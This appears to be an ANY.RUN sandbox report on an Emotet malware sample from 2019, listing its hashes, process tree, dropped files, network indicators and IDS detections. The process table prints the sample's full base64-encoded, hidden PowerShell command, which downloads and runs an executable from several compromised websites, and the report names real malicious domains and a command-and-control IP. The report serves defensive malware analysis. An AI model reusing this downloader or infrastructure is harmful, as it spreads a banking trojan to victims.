analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

d632a253aca68ef30eb21033364acb19.zip

Full analysis: https://app.any.run/tasks/cb5e570b-924d-4cdf-afde-06559299f656
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: May 20, 2019, 18:58:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet
trojan
emotet-doc
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

09B3F54DBDF46707356BA46D3A821D75

SHA1:

AA9F193213A962247ACBB4AB4B32903C5D7C505A

SHA256:

EE36FC2B10D9360F52B8ECDF882CBA1194804422C86D79F47AD42CE1A88246E2

SSDEEP:

1536:Oq4wZ8PJs6AhsHGiCxq6vOBQ3CEoDO/x70p4R8lCy3lazWd7wgp9TTIgzUcAMXyw:OqKmnuGyRm9z2p4R8lCCYWBwgkadXIJ0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 704.exe (PID: 3212)
      • 704.exe (PID: 3944)
      • soundser.exe (PID: 3460)
      • soundser.exe (PID: 764)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 4064)

    • Changes the autorun value in the registry

      • soundser.exe (PID: 764)

    • EMOTET was detected

      • soundser.exe (PID: 764)

    • Emotet process was detected

      • soundser.exe (PID: 3460)

    • Connects to CnC server

      • soundser.exe (PID: 764)

  • SUSPICIOUS

    • Starts Microsoft Office Application

      • rundll32.exe (PID: 3284)

    • PowerShell script executed

      • powershell.exe (PID: 4064)

    • Executed via WMI

      • powershell.exe (PID: 4064)

    • Creates files in the user directory

      • powershell.exe (PID: 4064)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4064)
      • 704.exe (PID: 3944)

    • Starts itself from another location

      • 704.exe (PID: 3944)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3132)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3132)

    • Manual execution by user

      • rundll32.exe (PID: 3284)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 2019:05:20 20:57:14
ZipCRC: 0x4b540921
ZipCompressedSize: 81871
ZipUncompressedSize: 130560
ZipFileName: d632a253aca68ef30eb21033364acb19
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
8
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winrar.exe no specs rundll32.exe no specs winword.exe no specs powershell.exe 704.exe no specs 704.exe #EMOTET soundser.exe no specs #EMOTET soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
3676"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\d632a253aca68ef30eb21033364acb19.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
3284"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\d632a253aca68ef30eb21033364acb19C:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3132"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\d632a253aca68ef30eb21033364acb19"C:\Program Files\Microsoft Office\Office14\WINWORD.EXErundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4064powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABxADcANABfADkAOAA0ADQAPQAnAHYAMgBfADkAMQAyACcAOwAkAGgANAAwADQAMwA4ADIAMwAgAD0AIAAnADcAMAA0ACcAOwAkAG4AMgAwADIAXwA5AD0AJwBLADAANQAzADAANAAyADUAJwA7ACQARAA0ADgAMwA3ADIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGgANAAwADQAMwA4ADIAMwArACcALgBlAHgAZQAnADsAJABIADYAXwBfADQAMAAxADEAPQAnAEUAMwAxAF8AOAAwADcAJwA7ACQAdwA5AF8AXwAxADUAOQA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBFAFQALgB3AEUAYgBgAGMAbABpAGAARQBgAE4AdAA7ACQAegA5ADEANgAwADUANgA3AD0AJwBoAHQAdABwADoALwAvAHQAbwBuAGcAZABhAGkAZgBwAHQALgBuAGUAdAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGgAeQBsAEsATABkAEoAVwBPAGgALwBAAGgAdAB0AHAAOgAvAC8AZQAtAHMAYQBsAGEAbQBwAHIAbwAuAGMAbwBtAC8AcwBhAHMAbgBlAGsAYQB0AC4AYwBvAG0ALwBhAHcAYwAyADYAMAAxAGIAXwBrAGYAOQA1AHUAbABkAHkANAAtADMANgAvAEAAaAB0AHQAcAA6AC8ALwBmAGkAbAB0AG8ALgBtAGwALwBjAGcAaQAtAGIAaQBuAC8AYQBNAHEAcQB1AEUAcwBRAHcALwBAAGgAdAB0AHAAOgAvAC8AcQBwAGQAaQBnAGkAdABlAGMAaAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AeABtAHQANgBrAHUANQA5AHAAbABfADgANgBiAHQAOABmAHYALQA3ADMAOQAxADkAOAAwADMALwBAAGgAdAB0AHAAOgAvAC8AbwBtAGUAcwB0AHIAZQBtAGEAcgBjAGUAbgBlAGkAcgBvAC4AYwBvAG0ALgBiAHIALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBjAGcAZQB5AF8AdgBwADgANgA3AHMAMgAzADgALQAxADcALwAnAC4AUwBwAEwAaQBUACgAJwBAACcAKQA7ACQAVgA1ADMANwBfADIANQBfAD0AJwByADkANAA4ADMANwAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgA1ADEANwBfADMAIABpAG4AIAAkAHoAOQAxADYAMAA1ADYANwApAHsAdAByAHkAewAkAHcAOQBfAF8AMQA1ADkALgBkAE8AVwBuAGwAbwBBAEQARgBJAEwARQAoACQAQgA1ADEANwBfADMALAAgACQARAA0ADgAMwA3ADIAKQA7ACQAcgAwADEAMgAwADMAPQAnAHoAMAA1ADcAXwA5ADUAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABEADQAOAAzADcAMgApAC4AbABFAE4AZwBUAGgAIAAtAGcAZQAgADIAOAA2ADcANQApACAAewAuACgAJwBJAG4AdgBvACcAKwAnAGsAZQAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACAAJABEADQAOAAzADcAMgA7ACQAegAwADEAOQAwADAAMQA9ACcAZgA4ADcAMAA1ADcANwAnADsAYgByAGUAYQBrADsAJAB3ADQANgBfADAANAAyADYAPQAnAEUAMQA0AF8AOAA4ADcAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBfADIAMgBfADcAPQAnAFMAXwAxAF8ANQAxADcANgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3212"C:\Users\admin\704.exe" C:\Users\admin\704.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3944--9447f139C:\Users\admin\704.exe
704.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3460"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
704.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
764--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 308
Read events
1 723
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
3
Text files
2
Unknown types
9

Dropped files

PID
Process
Filename
Type
3132WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR5ACA.tmp.cvr
MD5:
SHA256:
4064powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2KXCN4TE57GO00LFAMZ2.temp
MD5:
SHA256:
3132WINWORD.EXEC:\Users\admin\Desktop\~$32a253aca68ef30eb21033364acb19pgc
MD5:0DCB2A67EF579428AC3DF57DD6DF7FE5
SHA256:3BA3FDE83A9EA40AA36802E55E3C3EE6720D777603070BE5FD9F2CE83435EF45
3132WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:21F786EF3CE508DF28286994E7856523
SHA256:B594D06D7F56F23FDCA3485F5BD0BC779610D2CF32F2C2EF6BDCF5D8FDC00826
3132WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\d632a253aca68ef30eb21033364acb19.LNKlnk
MD5:0DEE1105910BAEA9587B9C92D5690607
SHA256:12B7EF13894B5E57D85718A981D6E5CF39D6E3A9C008DB105C0B5FC7DF307F3B
3132WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\275AD777.wmfwmf
MD5:6FA521F2A2CBACBA0EB9D8C40E4701EB
SHA256:B161E62C80C5411AD3105C6BA78D01FB016323373F569D773E47BF0AAC18B0DC
3132WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8E8F9C59D0A6226594806C598943CBF8
SHA256:80A0FCAD82A867858D6483406E14C4876B3F22B1CA1E12D9D61D955A1C71818D
3132WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E385DCE.wmfwmf
MD5:0F5E59AD6B84E24BAB3B7BE3A6D40B9C
SHA256:0752F8AD0C35DBBFC3A423E42D00B3873B43CA31E3FD59E0A5B45517E8B1B044
3132WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:449DDEDEAE0564CE645921D63B52EA1F
SHA256:2117095945D83FF975ABF9C8321A5CF7E41690DD82D1B6E11171C31B6C4F38A1
3132WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1AFEA6C1.wmfwmf
MD5:2DA88F0FE936F3B12CB340EACF81B8A6
SHA256:9EAB3E3621515F38E42BAA52ACD22C462B7E42D59BBC2693FD4316F2BD5514E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4064
powershell.exe
GET
200
203.113.174.46:80
http://tongdaifpt.net/wp-includes/hylKLdJWOh/
VN
executable
74.0 Kb
malicious
764
soundser.exe
POST
200
74.207.227.96:443
http://74.207.227.96:443/nsip/schema/ringin/merge/
US
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4064
powershell.exe
203.113.174.46:80
tongdaifpt.net
Viettel Corporation
VN
malicious
764
soundser.exe
74.207.227.96:443
Linode, LLC
US
malicious

DNS requests

Domain
IP
Reputation
tongdaifpt.net
  • 203.113.174.46
malicious

Threats

PID
Process
Class
Message
764
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
764
soundser.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
4064
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
4064
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
4064
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
d632a253aca68ef30eb21033364acb19.zip